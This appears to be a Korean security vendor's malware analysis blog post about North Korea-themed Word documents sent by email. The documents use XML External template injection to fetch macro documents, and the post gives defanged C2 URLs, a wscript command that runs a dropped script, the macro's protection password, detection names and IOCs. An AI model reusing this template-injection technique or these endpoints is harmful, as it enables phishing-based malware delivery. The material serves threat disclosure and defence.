ASEC 분석팀에서는 다양한 형태의 문서형 악성코드들에 대해 소개해왔다. 그 중에서 대북과 관련한 본문 내용의 악성 문서는 주로 HWP(한글) 형태로 제작되었고 이전 ASEC 블로그에서도 그 내용을 확인 할 수 있다. 이번에 소개할 내용은 대북 관련한 본문 내용이 담긴 악성 DOC(워드) 문서로, ASEC 분석팀에서 확보해온 해당 문서들의 일부를 공개하고자 한다.
메일로 인해 유포되었을 것으로 추정되는 해당 문서들은 아래와 같은 본문 내용을 포함하며, 문서 내부 XML에 작성된 코드에 ‘외부 External 연결 주소’로 접속하여 추가 문서 파일을 다운로드 받는다. XML 내부에 아래 예시와 같이 External로 정의된 외부 URL로 연결할 수 있다. 최근 들어 유포되는 대북관련 문서들에서 공통적으로 이러한 공격기법이 사용되고 있어서 주의가 요구된다.
| External 공격 예시 (XML 코드 일부) Target=”hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6″ TargetMode=”External“/> |
[문서 1] 파일명 : 질의서.docx
● External 연결 주소 : hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6
[문서 2] 파일명 : 업무보고.docx
● External 연결 주소 : hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6
[문서 3] 파일명 : 북한 8차 당대회 평가와 바이든 .docx
● External 연결 주소 : hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6
[문서 4] 파일명 : 당대회 결론.docx
● External 연결 주소 : hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119
[문서 5] 파일명 : 2021-0112 종합 당대회평가.docxx
● External 연결 주소 : hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119
[문서 1,2,3] 워드에는 보호 기능이 걸려있어 바로 문서 내용을 확인 할 수는 없다. VBA Macro가 다운로드 되었을 시 해당 매크로로부터 보호 기능해제가 가능하기 때문이다. 난독화된 매크로를 복호화한 결과 문서보호 해제를 위한 비밀번호는 “1qaz2wsx”였다. 아래의 구조로 동작하는 것으로 보이는 해당 문서들 중 VBA Macro 워드 파일이 확보된 [문서 1,2]에 대해 설명하고자 한다.
[문서1]은 단독 실행 시 위와 같이 문서가 보호된 형태로 북한 관련 질문 내용을 본문 내용에 포함하고 있다. 내부에는 추가 악성 매크로 워드 문서를 External을 통해 다운로드 연결하기 위해 아래와 같은 XML파일을 포함한다.
target으로 연결 시도하는 ‘hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6’에서 받아진 문서 파일 또한 워드 문서 형태이며 악성 매크로를 포함한다. 매크로 코드는 아래와 같이 난독화 되어있으며 실행 시 기본 office 사용자 서식 파일이 위치하는 template 폴더에 악성 xml을 생성 후 실행한다. 아래 난독화 된 매크로를 디버깅하는 중간 코드를 캡처한 것과 같이 생성할 xml 경로와 그 내용을 확인 할 수 있다.
- 명령 : wscript.exe //e:vbscript //b C:\Users\[사용자명]\AppData\Roaming\Microsoft\Templates\1589989024.xml
위 그림에서 확인 할 수 있듯 생성 된 xml 파일은 추가 악성 네트워크 주소로 접근 시도한다.
[문서 2] 파일 역시 중간 단계의 악성 매크로 워드 파일이 확인 되었는데 동작 구조와 난독화된 매크로의 형태가 매우 유사한 것으로 보아 동일한 공격자 그룹에 의해 제작되었을 것으로 보인다. 두 문서들의 C2를 정리하면 아래와 같으며 최종적으로 추가 악성코드를 다운로드하여 실행하였을 것으로 추정된다.
| [문서 1] 파일명 : 질의서.docx ○ XML External접속 후 추가 DOC 문서 다운로드 주소 : hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6 ○ 위 문서에서 생성한 XML이 추가 접속하는 주소 : hxxp://heritage2020.cafe24.com/skin/board/gallery/log/list.php?query=1 |
| [문서 2] 파일명 : 업무보고.docx ○ XML External접속 후 추가 DOC 문서 다운로드 주소 : hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6 ○ 위 문서에서 생성한 XML이 추가 접속하는 주소 : hxxp://koreacit.co.kr/skin/new/basic/update/list.php?query=1 |
위에서 언급한 것과 같이 이러한 문서들은 메일 통해 북한 관련 업무를 수행하는 수신자에게 보내졌을 가능성이 매우 크다. 스팸 메일을 통한 사회공학적 기법의 공격이 다수 증가한 만큼 사용자들은 이러한 공격에 피해가 발생하지 않도록 주의를 기울여야 한다.
자사에서는 위와 같은 파일들을 아래와 같이 진단 중이다.
[파일 진단]
Downloader/DOC.External
Downloader/XML.Generic
Downloader/DOC.Generic
Downloader/DOC.Agent
[IOC 정보]
hxxp://www.inonix.co.kr/kor/board/widgets/mcontent/skins/tmp?q=6
hxxp://heritage2020.cafe24.com/skin/board/gallery/log/list.php?query=1
hxxp://koreacit.co.kr/skin/new/basic/update/temp?q=6
hxxp://koreacit.co.kr/skin/new/basic/update/list.php?query=1
hxxps://reform-ouen.com/wp-includes/css/dist/nux/dotm/dwn.php?id=0119
hxxp://www.anpcb.co.kr/plugin/sns/facebook/src/update/normal.dotm?q=6
- 이전 대북 내용의 악성 HWP 파일
Categories:악성코드 정보